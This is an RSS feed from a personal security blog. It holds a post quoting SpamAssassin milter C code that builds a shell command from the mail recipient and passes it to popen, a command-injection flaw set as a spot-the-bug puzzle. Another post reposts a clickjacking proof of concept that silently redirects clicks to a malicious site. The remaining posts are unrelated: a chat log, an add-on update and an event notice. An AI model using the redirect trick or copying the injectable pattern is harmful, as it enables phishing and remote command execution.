<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Xanda's Blog !~!</title>
	<atom:link href="http://blog.xanda.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.xanda.org</link>
	<description>Human Knowledge Belongs To The World.</description>
	<lastBuildDate>Tue, 09 Mar 2010 14:08:16 +0000</lastBuildDate>
	
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>SpamAssassin Milter Plugin &#8216;mlfi_envrcpt()&#8217; Remote Arbitrary Command Injection Vulnerability</title>
		<link>http://blog.xanda.org/2010/03/09/spamassassin-milter-plugin-mlfi_envrcpt-remote-arbitrary-command-injection-vulnerability/</link>
		<comments>http://blog.xanda.org/2010/03/09/spamassassin-milter-plugin-mlfi_envrcpt-remote-arbitrary-command-injection-vulnerability/#comments</comments>
		<pubDate>Tue, 09 Mar 2010 14:07:36 +0000</pubDate>
		<dc:creator>xanda</dc:creator>
				<category><![CDATA[IT Related]]></category>
		<category><![CDATA[Bugtraq ID 38578]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[remote]]></category>
		<category><![CDATA[SpamAssassin]]></category>

		<guid isPermaLink="false">http://blog.xanda.org/?p=1077</guid>
		<description><![CDATA[Can you spot the bug?  

mlfi_envrcpt&#40;SMFICTX* ctx, char** envrcpt&#41;
&#123;
        struct context *sctx = &#40;struct context*&#41;smfi_getpriv&#40;ctx&#41;;
        SpamAssassin* assassin = sctx-&#62;assassin;
        FILE *p;
#if defined(__FreeBSD__)
        int rv;
#endif
&#160;
   [...]]]></description>
			<content:encoded><![CDATA[<p>Can you spot the bug? <img src='http://blog.xanda.org/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>

<div class="wp_syntax"><div class="code"><pre class="c" style="font-family:monospace;">mlfi_envrcpt<span style="color: #009900;">&#40;</span>SMFICTX<span style="color: #339933;">*</span> ctx<span style="color: #339933;">,</span> <span style="color: #993333;">char</span><span style="color: #339933;">**</span> envrcpt<span style="color: #009900;">&#41;</span>
<span style="color: #009900;">&#123;</span>
        <span style="color: #993333;">struct</span> context <span style="color: #339933;">*</span>sctx <span style="color: #339933;">=</span> <span style="color: #009900;">&#40;</span><span style="color: #993333;">struct</span> context<span style="color: #339933;">*</span><span style="color: #009900;">&#41;</span>smfi_getpriv<span style="color: #009900;">&#40;</span>ctx<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
        SpamAssassin<span style="color: #339933;">*</span> assassin <span style="color: #339933;">=</span> sctx<span style="color: #339933;">-&gt;</span>assassin<span style="color: #339933;">;</span>
        FILE <span style="color: #339933;">*</span>p<span style="color: #339933;">;</span>
<span style="color: #339933;">#if defined(__FreeBSD__)</span>
        <span style="color: #993333;">int</span> rv<span style="color: #339933;">;</span>
<span style="color: #339933;">#endif</span>
&nbsp;
        debug<span style="color: #009900;">&#40;</span>D_FUNC<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;mlfi_envrcpt: enter&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
        <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span>flag_expand<span style="color: #009900;">&#41;</span>
        <span style="color: #009900;">&#123;</span>
                <span style="color: #808080; font-style: italic;">/* open a pipe to sendmail so we can do addressexpansion */</span>
&nbsp;
                <span style="color: #993333;">char</span> buf<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">1024</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
                <span style="color: #993333;">char</span> <span style="color: #339933;">*</span>fmt<span style="color: #339933;">=</span><span style="color: #ff0000;">&quot;%s -bv <span style="color: #000099; font-weight: bold;">\&quot;</span>%s<span style="color: #000099; font-weight: bold;">\&quot;</span> 2&gt;&amp;1&quot;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #339933;">#if defined(HAVE_SNPRINTF)</span>
                snprintf<span style="color: #009900;">&#40;</span>buf<span style="color: #339933;">,</span> <span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span>buf<span style="color: #009900;">&#41;</span><span style="color: #339933;">-</span><span style="color: #0000dd;">1</span><span style="color: #339933;">,</span> fmt<span style="color: #339933;">,</span> SENDMAIL<span style="color: #339933;">,</span> envrcpt<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">0</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #339933;">#else</span>
                sprintf<span style="color: #009900;">&#40;</span>buf<span style="color: #339933;">,</span> fmt<span style="color: #339933;">,</span> SENDMAIL<span style="color: #339933;">,</span> envrcpt<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">0</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #339933;">#endif</span>
&nbsp;
                debug<span style="color: #009900;">&#40;</span>D_RCPT<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;calling %s&quot;</span><span style="color: #339933;">,</span> buf<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #339933;">#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */</span>
                rv <span style="color: #339933;">=</span> pthread_mutex_lock<span style="color: #009900;">&#40;</span><span style="color: #339933;">&amp;</span>popen_mutex<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
                <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span>rv<span style="color: #009900;">&#41;</span>
                <span style="color: #009900;">&#123;</span>
                        debug<span style="color: #009900;">&#40;</span>D_ALWAYS<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;Could not lock popen mutex: %s&quot;</span><span style="color: #339933;">,</span> strerror<span style="color: #009900;">&#40;</span>rv<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
                        abort<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
                <span style="color: #009900;">&#125;</span>
<span style="color: #339933;">#endif</span>
&nbsp;
                p <span style="color: #339933;">=</span> popen<span style="color: #009900;">&#40;</span>buf<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;r&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
                <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span>p<span style="color: #009900;">&#41;</span>
                <span style="color: #009900;">&#123;</span>
                        debug<span style="color: #009900;">&#40;</span>D_RCPT<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;popen failed(%s).  Will not expand aliases&quot;</span><span style="color: #339933;">,</span> strerror<span style="color: #009900;">&#40;</span>errno<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
                        assassin<span style="color: #339933;">-&gt;</span>expandedrcpt.<span style="color: #202020;">push_back</span><span style="color: #009900;">&#40;</span>envrcpt<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">0</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

]]></content:encoded>
			<wfw:commentRss>http://blog.xanda.org/2010/03/09/spamassassin-milter-plugin-mlfi_envrcpt-remote-arbitrary-command-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Phishing or Clickjacking?</title>
		<link>http://blog.xanda.org/2010/02/26/phishing-or-clickjacking/</link>
		<comments>http://blog.xanda.org/2010/02/26/phishing-or-clickjacking/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 16:04:17 +0000</pubDate>
		<dc:creator>xanda</dc:creator>
				<category><![CDATA[IT Related]]></category>
		<category><![CDATA[clickjacking]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[full disclosure]]></category>
		<category><![CDATA[mozilla]]></category>

		<guid isPermaLink="false">http://blog.xanda.org/?p=1070</guid>
		<description><![CDATA[I was about to shutdown my machine and go to sleep but suddenly my RSS reader popping up new feeds.
Here is one thing that made me smile:
Mozilla firefox 3.6 unpatched phishing vulnerability
From: bugsbanned () hushmail com
Date: Wed, 24 Feb 2010 19:29:33 -0300
&#8230;Unpatched bug since Mozilla firefox 3.0&#8230;
Mozilla &#8220;INsecurity team&#8221; remember, security through obscurity just
DOESN&#8217;T WORK&#8230;
Locking [...]]]></description>
			<content:encoded><![CDATA[<p>I was about to shutdown my machine and go to sleep but suddenly my RSS reader popping up new feeds.</p>
<p>Here is one thing that made me smile:</p>
<blockquote><p><strong>Mozilla firefox 3.6 unpatched phishing vulnerability</strong></p>
<p>From: bugsbanned () hushmail com<br />
Date: Wed, 24 Feb 2010 19:29:33 -0300</p>
<p>&#8230;Unpatched bug since Mozilla firefox 3.0&#8230;</p>
<p>Mozilla &#8220;INsecurity team&#8221; remember, security through obscurity just<br />
DOESN&#8217;T WORK&#8230;<br />
Locking down bugzilla advisories even the 2 years old ones is<br />
unnecessary and lame.</p>
<p>&lt;html&gt;<br />
&lt;body&gt;<br />
&lt;div id=&#8221;mydiv&#8221;<br />
onmouseover=&#8221;document.location=&#8217;http://Maliciouswebsite&#8217;;&#8221;<br />
style=&#8221;position:absolute;width:2px;height:2px;background:#FFFFFF;bor<br />
der:0px&#8221;&gt;&lt;/div&gt;<br />
&lt;script&gt;<br />
function updatebox(evt) {<br />
mouseX=evt.pageX?evt.pageX:evt.clientX;<br />
mouseY=evt.pageY?evt.pageY:evt.clientY;<br />
document.getElementById(&#8216;mydiv&#8217;).style.left=mouseX-1;<br />
document.getElementById(&#8216;mydiv&#8217;).style.top=mouseY-1;<br />
}<br />
&lt;/script&gt;<br />
&lt;br&gt;<br />
&lt;a href=&#8221;http://trustedwebsite&#8221;; onclick=&#8221;updatebox(event)&#8221;&gt;&lt;font<br />
style=&#8221;font-family:arial;font-size:32px&#8221;&gt;http://trusted<br />
website&lt;/font&gt;&lt;/a&gt;&lt;br&gt;</p>
<p>&lt;/div&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</p>
<p>For example:</p>
<p>&lt;html&gt;<br />
&lt;body&gt;<br />
&lt;div id=&#8221;mydiv&#8221;<br />
onmouseover=&#8221;document.location=&#8217;http://www.wikipedia.org&#8217;;&#8221;<br />
style=&#8221;position:absolute;width:2px;height:2px;background:#FFFFFF;bor<br />
der:0px&#8221;&gt;&lt;/div&gt;<br />
&lt;script&gt;<br />
function updatebox(evt) {<br />
mouseX=evt.pageX?evt.pageX:evt.clientX;<br />
mouseY=evt.pageY?evt.pageY:evt.clientY;<br />
document.getElementById(&#8216;mydiv&#8217;).style.left=mouseX-1;<br />
document.getElementById(&#8216;mydiv&#8217;).style.top=mouseY-1;<br />
}<br />
&lt;/script&gt;<br />
&lt;br&gt;<br />
&lt;a href=&#8221;http://www.google.com&#8221;; onclick=&#8221;updatebox(event)&#8221;&gt;&lt;font<br />
style=&#8221;font-family:arial;font-<br />
size:32px&#8221;&gt;http://www.google.com&lt;/font&gt;&lt;/a&gt;&lt;br&gt;</p>
<p>&lt;/div&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</p>
<p>Source:www exploit-db com</p></blockquote>
<p>Phishing huh? To me its clickjacking <img src='http://blog.xanda.org/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Source: <a href="http://seclists.org/fulldisclosure/2010/Feb/434" target="_blank">http://seclists.org/fulldisclosure/2010/Feb/434</a></p>
<p>P/S: Owh ya, NoScript is one of my best friend and he wants to be your best friend to <img src='http://blog.xanda.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.xanda.org/2010/02/26/phishing-or-clickjacking/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Mangsa :: salawank</title>
		<link>http://blog.xanda.org/2010/02/25/mangsa-salawank/</link>
		<comments>http://blog.xanda.org/2010/02/25/mangsa-salawank/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 15:09:27 +0000</pubDate>
		<dc:creator>xanda</dc:creator>
				<category><![CDATA[Wall of shame]]></category>
		<category><![CDATA[livescore2facebook]]></category>
		<category><![CDATA[mangsa]]></category>
		<category><![CDATA[salawank]]></category>

		<guid isPermaLink="false">http://blog.xanda.org/?p=1068</guid>
		<description><![CDATA[
&#60;xanda&#62; salawank: livescore2facebook aku dah cun.. nanti aku release source code.. 
&#60;xanda&#62; salawank: world cup nie.. mesti dapat sambutan nie
&#60;salawank&#62; xanda: nice.. aku usya, nak2 time dia inform chelase kalah
&#60;salawank&#62; hoho
&#60;salawank&#62; xanda: code dlm ruby ke?
&#60;xanda&#62; salawank: asal nye aku code ruby
&#60;xanda&#62; salawank: last last...
&#60;salawank&#62; php
&#60;xanda&#62; salawank: tak.. ruby la.. buat apa nak tuka2?
&#60;salawank&#62; siot
&#60;xanda&#62; [...]]]></description>
			<content:encoded><![CDATA[
<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">&lt;xanda&gt; salawank: livescore2facebook aku dah cun.. nanti aku release source code.. 
&lt;xanda&gt; salawank: world cup nie.. mesti dapat sambutan nie
&lt;salawank&gt; xanda: nice.. aku usya, nak2 time dia inform chelase kalah
&lt;salawank&gt; hoho
&lt;salawank&gt; xanda: code dlm ruby ke?
&lt;xanda&gt; salawank: asal nye aku code ruby
&lt;xanda&gt; salawank: last last...
&lt;salawank&gt; php
&lt;xanda&gt; salawank: tak.. ruby la.. buat apa nak tuka2?
&lt;salawank&gt; siot
&lt;xanda&gt; HAHAHAHA</pre></div></div>

]]></content:encoded>
			<wfw:commentRss>http://blog.xanda.org/2010/02/25/mangsa-salawank/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>XandaForceHTTPS Updated</title>
		<link>http://blog.xanda.org/2010/02/25/xandaforcehttps-updated/</link>
		<comments>http://blog.xanda.org/2010/02/25/xandaforcehttps-updated/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 02:29:58 +0000</pubDate>
		<dc:creator>xanda</dc:creator>
				<category><![CDATA[IT Related]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[https]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[XandaForceHTTPS]]></category>

		<guid isPermaLink="false">http://blog.xanda.org/?p=1066</guid>
		<description><![CDATA[
XandaForceHTTPS updated. Now with Firefox 3.6.* support. Requested by LinuxMalaysia
Read more HERE
]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img src="http://img.xanda.org/galleries/xandaforcrhttps.png" alt="" /></p>
<p>XandaForceHTTPS updated. Now with Firefox 3.6.* support. Requested by <a href="http://twitter.com/linuxmalaysia">LinuxMalaysia</a></p>
<p>Read more <strong><a href="http://blog.xanda.org/2009/09/14/xandaforcehttps/">HERE</a></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.xanda.org/2010/02/25/xandaforcehttps-updated/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Maulidurrasul di Yayasan Al Jenderami</title>
		<link>http://blog.xanda.org/2010/02/22/maulidurrasul-di-yayasan-al-jenderami/</link>
		<comments>http://blog.xanda.org/2010/02/22/maulidurrasul-di-yayasan-al-jenderami/#comments</comments>
		<pubDate>Mon, 22 Feb 2010 05:13:00 +0000</pubDate>
		<dc:creator>xanda</dc:creator>
				<category><![CDATA[General Info]]></category>
		<category><![CDATA[Jenderami]]></category>
		<category><![CDATA[Maulidurrasul]]></category>

		<guid isPermaLink="false">http://blog.xanda.org/?p=1063</guid>
		<description><![CDATA[
Tema: &#8220;Tradisi Salafussoleh Benteng Ahli Sunnah Wal Jamaah&#8221;
Tarikh: 18hb &#8211; 20hb Rabi&#8217;ul Awal 1431 (Khamis, Jumaat dan Sabtu) bersamaan 4hb &#8211; 6hb Mac 2010
Tempat: Kompleks Yayasan Al-Jenderami, Kg Jenderam Hilir, 43800 Dengkil, Selangor DE
[read more HERE]
]]></description>
			<content:encoded><![CDATA[<div align="center"><img src="http://1.bp.blogspot.com/_Xug5qyNa91g/S2kgj6GOiFI/AAAAAAAAAIE/bMAYFs7BlNE/s400/Pamplet+Muka+Depan.jpg"></div>
<p>Tema: &#8220;Tradisi Salafussoleh Benteng Ahli Sunnah Wal Jamaah&#8221;</p>
<p>Tarikh: 18hb &#8211; 20hb Rabi&#8217;ul Awal 1431 (Khamis, Jumaat dan Sabtu) bersamaan 4hb &#8211; 6hb Mac 2010</p>
<p>Tempat: Kompleks Yayasan Al-Jenderami, Kg Jenderam Hilir, 43800 Dengkil, Selangor DE</p>
<p>[read more <strong><a href="http://yayasanaljenderami.blogspot.com/2010/02/pihak-yayasan-al-jenderami-berserta.html">HERE</a></strong>]</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.xanda.org/2010/02/22/maulidurrasul-di-yayasan-al-jenderami/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
